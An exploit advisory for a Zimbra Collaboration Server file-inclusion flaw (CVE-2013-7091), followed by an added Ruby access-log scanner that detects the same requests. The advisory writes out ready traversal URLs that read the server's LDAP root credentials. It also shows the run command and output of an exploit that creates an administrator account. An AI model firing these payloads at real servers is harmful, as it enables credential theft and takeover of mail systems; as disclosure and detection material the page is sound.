Zimbra 8.0.2 and 7.2.2 Collaboration Server LFI
2013-12-15 / 2013-12-23
Credit: rubina119
Risk: High
Local: No
Remote: Yes
CVE: CVE-2013-7091
CWE: CWE-264

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz which allows us to see localconfig.xml, which contains the LDAP root credentials, which allow us to make requests to the /service/admin/soap API with the stolen LDAP credentials to create a user with administration privileges and gain access to the Administration Console.

LFI is located at:
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Example:
https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
or
https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

----------------Exploit-----------------

Before using this exploit, the target server must have the admin console port "7071" open, otherwise it won't work.

Use the exploit like this:

ruby run.rb -t mail.example.com -u someuser -p Test123_23

[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : https://mail.example.com:7071/zimbraAdmin/
[*] Account : someuser@example.com
[*] Password : Test123_23
[+] Successfully Exploited !

The number of vuln servers is huge, like 80/100.

This is only for educational purposes.

References:
http://cxsecurity.com/issue/WLB-2013120155
http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
http://osvdb.org/100747
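As an added, defender-side example that is not part of the original advisory or of the rubina119 exploit: a small Ruby scanner that runs over web-server access-log lines and flags requests matching the pattern the advisory describes, namely the localized message-bundle endpoint (the ...TemplateMsg.js.zgz resource, on the webmail or the :7071/zimbraAdmin path) with a skin= value that walks out of the skin directory (../), carries a null byte (%00) or is an absolute path. The log lines, client IP addresses and the helper names (scan_log, suspicious_skin?, parse_request) are constructed for this example and are not from the page.

```ruby
require 'cgi'

# Constructed sample access-log lines (combined log format); not real traffic.
# Lines 1 and 3 reproduce the request shape from the advisory, line 2 is a
# legitimate skin lookup, line 4 is unrelated.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [15/Dec/2013:10:01:02 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  198.51.100.7 - - [15/Dec/2013:10:01:05 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=harmony HTTP/1.1" 200 41200 "-" "Mozilla/5.0"
  203.0.113.5 - - [15/Dec/2013:10:01:09 +0000] "GET /zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=..%2F..%2F..%2Fopt%2Fzimbra%2Fconf%2Flocalconfig.xml%00 HTTP/1.1" 200 5120 "-" "curl/7.29"
  192.0.2.9 - - [15/Dec/2013:10:02:00 +0000] "GET /zimbra/ HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
LOG

# A ".." segment delimited by slashes or backslashes, at any position.
TRAVERSAL_RE = %r{(^|[\\/])\.\.([\\/]|$)}

# Classify a decoded skin= value. Returns a symbol naming the indicator, or nil
# when the value looks like an ordinary skin name.
def suspicious_skin?(skin)
  return :traversal if skin =~ TRAVERSAL_RE
  return :null_byte if skin.include?("\u0000")
  return :absolute_path if skin.start_with?('/')
  nil
end

# Pull client IP, request path and raw query string out of one log line.
def parse_request(line)
  m = line.match(%r{"(?:GET|POST|HEAD) (\S+) HTTP/})
  return nil unless m
  ip = line.split(' ', 2).first
  path, query = m[1].split('?', 2)
  [ip, path, query || '']
end

# Scan log text and return one finding hash per suspicious skin= value.
def scan_log(text)
  findings = []
  text.each_line do |line|
    req = parse_request(line)
    next unless req
    ip, path, query = req
    # Only the localized message bundle endpoint is affected; skip everything else.
    next unless path.end_with?('.js.zgz')
    # CGI.parse percent-decodes values, so %2F and %00 become "/" and "\0".
    CGI.parse(query).fetch('skin', []).each do |skin|
      reason = suspicious_skin?(skin)
      next unless reason
      findings << { ip: ip, path: path, skin: skin.delete("\u0000"), reason: reason }
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  # With no arguments the constructed sample is scanned; otherwise the named log files.
  input = ARGV.empty? ? SAMPLE_LOG : ARGF.read
  scan_log(input).each do |f|
    puts "#{f[:ip]} #{f[:reason]} #{f[:path]} skin=#{f[:skin]}"
  end
end
```

Decoding the query before matching matters: the second hit in the sample encodes the traversal as %2F, which a plain substring search for "../" on the raw line would miss. Requests to the :7071 admin console path are covered the same way, since the match is on the resource suffix and the decoded parameter rather than on the virtual host.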


